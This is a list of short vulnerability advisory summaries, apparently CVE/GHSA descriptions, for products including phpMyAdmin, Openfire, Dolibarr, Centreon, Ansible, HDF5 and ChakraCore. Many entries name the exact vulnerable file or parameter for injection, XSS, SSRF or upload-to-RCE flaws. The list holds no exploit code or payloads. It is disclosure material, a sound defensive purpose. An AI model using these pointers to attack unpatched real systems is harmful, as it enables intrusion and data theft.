In Mozilla Bleach, a mutation XSS in bleach.clean when RCDATA and either svg or math tags are in the allowlist with the keyword argument strip=False.

A carefully crafted or corrupt PSD file can cause excessive memory usage in Apache Tika's PSDParser.

A carefully crafted or corrupt PSD file can cause an infinite loop in Apache Tika's PSDParser.

CodeIgniter allows remote attackers to gain privileges via a modified Email ID to the "Select Role of the User" page. NOTE: A contributor to the CodeIgniter framework argues that the issue should not be attributed to CodeIgniter. Furthermore, the blog post reference shows an unknown website built with the CodeIgniter framework but that CodeIgniter is not responsible for introducing this issue because the framework has never provided a login screen, …

eZ Publish Legacy allow remote attackers to execute arbitrary code by uploading PHP code, unless the vhost configuration permits only app.php execution.

eZ allow remote attackers to execute arbitrary code by uploading PHP code, unless the vhost configuration permits only app.php execution.

An SQL injection vulnerability was found in retrieval of the current username (in libraries/classes/Server/Privileges.php and libraries/classes/UserPassword.php). A malicious user with access to the server could create a crafted username, and then trick the victim into performing specific actions with that user account (such as editing its privileges).

In phpMyAdmin, an SQL injection vulnerability has been discovered where certain parameters are not properly escaped when generating certain queries for search actions in libraries/classes/Controllers/Table/TableSearchController.php. An attacker can generate a crafted database or table name. The attack can be performed if a user attempts certain search operations on the malicious database or table.

A heap-based buffer overflow exists in the function Decompress() located in decompress.c. It can be triggered by sending a crafted file to the gif2h5 binary. It allows an attacker to cause Denial of Service.

An issue was discovered in HDF5. A heap-based buffer over-read exists in the function H5O__layout_decode() located in H5Olayout.c. It allows an attacker to cause Denial of Service.

A NULL pointer dereference exists in the function H5F_get_nrefs() located in H5Fquery.c. It allows an attacker to cause Denial of Service.

A NULL pointer dereference exists in the function H5AC_unpin_entry() located in H5AC.c. It allows an attacker to cause Denial of Service.

An SQL injection vulnerability was discovered where malicious code could be used to trigger an XSS attack through retrieving and displaying results (in tbl_get_field.php and libraries/classes/Display/Results.php). The attacker must be able to insert crafted data into certain database tables, which when retrieved (for instance, through the Browse tab) can trigger the XSS attack.

An open URL redirect via the p parameter in login.php in Centreon allows an attacker to craft a potentially malicious payload to execute unintended behavior.

A prototype pollution vulnerability in fastify-multipart allows an attacker to crash fastify applications when parsing multipart requests by sending a specially crafted request.

Cloud Native Computing Foundation Harbor allows SQL Injection via project quotas in the VMware Harbor Container Registry for the Pivotal Platform.

Cloud Native Computing Foundation Harbor allows SQL Injection via user-groups in the VMware Harbor Container Registry for the Pivotal Platform.

The uppy npm package is vulnerable to a Server-Side Request Forgery (SSRF) vulnerability, which allows an attacker to scan local or external networks or otherwise interact with internal systems.

Server-side request forgery (SSRF) vulnerability in Ghost CMS allows an attacker to scan local or external network or otherwise interact with internal systems.

Local File Inclusion in minPlayCommand.php in Centreon allows an attacker to traverse paths via a plugin test.

A flaw in Centreon's minPlayCommand.php allows an attacker to achieve command injection via a plugin test.

phpBB allows adding an arbitrary Cascading Style Sheets (CSS) token sequence to a page through BBCode.

Cloud Native Computing Foundation Harbor has a Privilege Escalation Vulnerability in the VMware Harbor Container Registry for the Pivotal Platform.

Cloud Native Computing Foundation Harbor allows CSRF in the VMware Harbor Container Registry for the Pivotal Platform.

Code injection vulnerability in blamer may result in remote code execution when the input can be controlled by an attacker.

The Library API in buger jsonparser allows attackers to cause a denial of service (infinite loop) by means of a call to Delete.

In EasyBuild, the GitHub Personal Access Token (PAT) used by EasyBuild for the GitHub integration features (like –new-pr, –fro,-pr, etc.) is shown in plain text in EasyBuild debug log files.

The GitHub Personal Access Token (PAT) used by EasyBuild for the GitHub integration features (like –new-pr, –from-pr, etc.) is shown in plain text in EasyBuild debug log files. Scope: the log message only appears in the top-level log file, not in the individual software installation logs (see https://easybuild.readthedocs.io/en/latest/Logfiles.html); as a consequence, tokens are not included in the partial log files that are uploaded into a gist when using –upload-test-report in …

Ignite Realtime Openfire allows XSS via the setup/setup-datasource-standard.jsp serverURL parameter.

Ignite Realtime Openfire suffers from a Cross-site Scripting (XSS) vulnerability in the setup/setup-datasource-standard.jsp password parameter.

Ignite Realtime Openfire suffers from a Cross-site Scripting (XSS) vulnerability in the setup/setup-datasource-standard.jsp driver parameter.

In ActionView there is a possible XSS vulnerability in ActionView's JavaScript literal escape helpers. Views that use the j or escape_javascript methods may be susceptible to XSS.

An open redirect exists in the Lesson edit page.

A vulnerability was found in Moodle where tokens used to fetch inline atachments in email notifications were not disabled when a user account was no longer active.

FasterXML jackson-databind mishandles the interaction between serialization gadgets and typing, related to com.caucho.config.types.ResourceRef.`

A reflected XSS is possible through fatal error messages.

Ignite Realtime Openfire suffers from a Cross-site Scripting (XSS) vulnerability in the setup/setup-datasource-standard.jsp username parameter.

There is blind XSS reflected in some locations where user email is displayed.

Golang Facebook Thrift servers would not error upon receiving messages declaring containers of sizes larger than the payload. As a result, malicious clients could send short messages which would result in a large memory allocation, potentially leading to denial of service.

OpenCart allows remote authenticated users to conduct XSS attacks via a crafted filename in the user image upload section.

Subrion CMS (and possibly earlier versions) allow CSRF to change the administrator password via the panel/members/edit/1 URI.

In OPC Foundation OPC UA .NET Standard codebase, servers do not create sufficiently random numbers in OPCFoundation.NetStandard.Opc.Ua, which allows man in the middle attackers to reuse encrypted user credentials sent over the network.

In OPC Foundation OPC UA .NET Standard codebase 1.4.357.28, servers do not create sufficiently random numbers in OPCFoundation.NetStandard.Opc.Ua before 1.4.359.31, which allows man in the middle attackers to reuse encrypted user credentials sent over the network.

Umbraco CMS allows an authenticated file upload (and consequently Remote Code Execution) via the Install Package functionality.

Umbraco Cloud allows an authenticated file upload (and consequently Remote Code Execution) via the Install Packages functionality.

Dolibarr ERP/CRM allows SQL Injection.

Dolibarr ERP/CRM allows XSS via the qty parameter to product/fournisseurs.php (product price screen).

An issue was discovered in psd-tools before 1.9.4. The Cython implementation of RLE decoding did not check for malformed PSD input data during decoding to the PIL.Image or NumPy format, leading to a Buffer Overflow.

A flaw was found in the Ansible Engine when the fetch module is used. An attacker could intercept the module, inject a new path, and then choose a new destination path on the controller node.

A flaw was found in Ansible Engine when using Ansible Vault for editing encrypted files. When a user executes ansible-vault edit, another user on the same computer can read the old and new secret, as it is created in a temporary file with mkstemp and the returned file descriptor is closed and the method write_data is called to write the existing secret in the file. This method will delete the …

Sensitive parameters such as passwords and tokens are passed to kubectl from the command line, not using an environment variable or an input configuration file. This will disclose passwords and tokens from process list and no_log directive from debug module would not have any effect making these secrets being disclosed on stdout and log files.

yargs-parser could be tricked into adding or modifying properties of Object.prototype using a proto payload.

When TLS is enabled with ssl-endpoint-identification-enabled set to true, Apache Geode fails to perform hostname verification of the entries in the certificate SAN during the SSL handshake. This could compromise intra-cluster communication using a man-in-the-middle attack.

Contao is vulnerable to XSS when viewing the system log. An unauthenticated attacker can inject a script which is executed when a logged-in backend user views the system log.

Dolibarr ERP/CRM allows XSS because uploaded HTML documents are served as text/html despite being renamed to .noexe files.

Dolibarr ERP/CRM has an Insufficient Filtering issue that can lead to user/card.php XSS.

Codiad Web IDE allows PHP Code injection.

A flaw was found in Ansible Engine when the module package or service is used and the parameter use is not specified. If a previous task is executed with a malicious user, the module sent can be selected by the attacker using the ansible facts file.

The package integrity validation in yarn contains a TOCTOU vulnerability where the hash is computed before writing a package to cache. It's not computed again when reading from the cache. This may lead to a cache pollution attack.

gulp-styledocco allows execution of arbitrary OS commands. The options argument of the exports function in index.js can be controlled by users without any sanitization.

node-prompt-here allows execution of arbitrary commands. The runCommand() is called by getDevices() function in file linux/manager.js, which is required by the index. process.env.NM_CLI in the file linux/manager.js. This function is used to construct the argument of function execSync(), which can be controlled by users without any sanitization.

pulverizr allows execution of arbitrary commands. Within lib/job.js, the variable filename can be controlled by the attacker. This function uses the variable filename to construct the argument of the exec call without any sanitization. In order to successfully exploit this vulnerability, an attacker will need to create a new file with the same name as the attack command.

gulp-scss-lint allows execution of arbitrary commands. It is possible to inject arbitrary commands to the exec function located in src/command.js via the provided options.

docker-compose-remote-api allows execution of arbitrary OS commands. Within index.js of the package, the variable serviceName passed to the function exec(serviceName, cmd, fnStdout, fnStderr, fnExit) can be controlled by users to provide OS commands without any sanitization.

closure-compiler-stream allows execution of arbitrary commands. The argument options of the exports function in index.js can be controlled by users without any sanitization.

It is possible to inject arbitrary OS commands by passing them into gulp-tape options.

Attackers with access to a notionally invalidated token could obtain a new, working token via the refresh endpoint, because the denylist protection mechanism is incompatible with the token-refresh feature.

The dot package uses Function() to compile templates. This can be exploited by the attacker if they can control the given template or if they can control the value set on Object.prototype.

BookStack before version 0.25.5 has a vulnerability where a user could upload PHP files through image upload functions, which would allow them to execute code on the host system remotely. They would then have the permissions of the PHP process. This most impacts scenarios where non-trusted users are given permission to upload images in any area of the application. The issue was addressed in a series of patches in versions …

In Administrate (rubygem), when sorting by attributes on a dashboard, the direction parameter was not validated before being interpolated into the SQL query. This could present a SQL injection if the attacker were able to modify the direction parameter and bypass ActiveRecord SQL protections. Whilst this does have a high-impact, to exploit this you need access to the Administrate dashboards, which we would expect to be behind authentication.

python-docutils allows insecure usage of temporary files.

Apache Commons Configuration uses a third-party library to parse YAML files which by default allows the instantiation of classes if the YAML includes special statements. If a YAML file was loaded from an untrusted source, it could therefore load and execute code out of the control of the host application.

Withdrawn: Duplicate of GHSA-2fch-jvg5-crf6

An XSS issue was discovered in tooltip/tooltip.js in PrimeTek PrimeFaces. In a web application using PrimeFaces, an attacker can provide JavaScript code in an input field whose data is later used as a tooltip title without any input validation.

Any user with access to the CMS can view and delete other users' 2FA devices by going to the correct path. The user does not require special permissions in order to do so. By deleting the other user's device they can disable the target user's 2FA devices and potentially compromise the account if they figure out their password.

Torpedo Query mishandles the LIKE operator in ConditionBuilder.java, LikeCondition.java, and NotLikeCondition.java.

querymen allows modification of object properties. The parameters of exported function handler(type, name, fn) can be controlled by users without any sanitization. This could be abused for Prototype Pollution attacks.

An information disclosure vulnerability exists when Chakra improperly discloses the contents of its memory, which could provide an attacker with information to further compromise the user's computer or data. To exploit the vulnerability, an attacker must know the memory address of where the object was created.

A flaw was found in Ansible when a password is set with the argument password of svn module, it is used on svn command line, disclosing to other users within the same node. An attacker could take advantage by reading the cmdline file from that particular PID on the procfs.

A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers.

A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory.

A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory.

A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge (HTML-based).

A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory.

A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory.

A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory.

A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory.

A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory.

A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory.

A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge (HTML-based).

A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers.

An elevation of privilege vulnerability exists when the Windows Language Pack Installer improperly handles file operations, aka 'Windows Language Pack Installer Elevation of Privilege Vulnerability'. Note this is due to axis2 clustering including a dependency to tomcat which is vulnerable to this issue.

A flaw was discovered in the python-novajoin plugin, all versions up to, excluding 1.1.1, for Red Hat OpenStack Platform. The novajoin API lacked sufficient access control, allowing any keystone authenticated user to generate FreeIPA tokens.

This advisory has been marked as False-Positive and removed.

psutil (aka python-psutil) through 5.6.5 can have a double free. This occurs because of refcount mishandling within a while or for loop that converts system data into a Python object.